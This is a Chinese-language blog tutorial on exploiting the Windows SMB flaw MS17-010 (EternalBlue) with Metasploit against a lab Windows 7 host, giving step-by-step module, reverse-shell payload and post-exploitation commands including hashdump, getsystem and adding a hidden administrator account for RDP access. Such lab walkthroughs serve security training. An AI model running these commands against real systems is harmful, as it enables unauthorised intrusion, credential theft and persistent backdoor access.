MSF-ms17-010

        MS17_010漏洞(永恒之蓝)

一、概述

1、官方描述:https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-
010

2、漏洞描述:Microsoft Windows SMB Server远程代码执行漏洞。

3、影响范围:对windows7和windows server 2008等大部分版本的操作系统。

二、实战

1、实验环境

攻击机kali(2021):192.168.200.104

靶机win7:192.168.200.105

注:查看靶机是否存活,可以配合nmap使用

2、操作

(1)、kali启动metasploit测试平台

命令:msfconsole

(2)、搜索kali中有没有ms17_010漏洞模块

命令:search ms17_010

结果发现有的

(3)、使用auxiliary/scanner/smb/smb_ms17_010即辅助扫描模块,扫描靶机是否存在ms-17-010漏洞

命令1:use 3    #使用模块

注:use后面可以写id值或name值。

命令2:show options   #查看所使用的模块需要配置的参数

发现还需要填写RHOSTS的参数

命令3:set rhosts 192.168.200.105   #设置目标主机为靶机

命令4:run或exploit   #yunxing

发现靶机似乎存在该漏洞

(4)、使用exploit/windows/smb/ms17_010_eternalblue即漏洞利用模块,攻击靶机

命令1:use 0

命令2:show options

命令3:set rhosts 192.168.200.105

注:有点可能还需要设置攻击机(本地)ip地址

命令4:set payload windows/x64/meterpreter/reverse_tcp #设置攻击载荷,使它不易发现

命令5:run

3、对靶机进行操作,命令如下

查看目标靶机信息:sysinfo

获取屏幕快照:screenshot

上传文件:upload /home/kali/Desktop/dict/IP.txt  c:\\set

下载文件:download 靶机filedir  攻击机filedir

4、提权(后渗透利用)

(1)、查看权限:Windows命令为:getuid
                  Linux命令为:whoami

注:如果已是管理员用户,输入hashdump,再解密

(2)、进入shell,添加用户

命令:net user 用户 密码 /add

(3)、把刚刚创建好的用户添加到管理员组,提升为管理员

命令:net localgroup administrators 用户 /add

(4)、远程登录刚建好的用户

命令:rdesktop 192.168.200.105

四、补充,攻击成功进入meterpreter后,常用命令

将当前会话隐藏在后台:background

打开终端:shell

出现乱码:chcp 65001

查看在活动中的会话:sessions

在目标机上执行文件:execute        

获取目标系统上当前的工作目录:getwd

获取系统最高用户的权限:getsystem

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值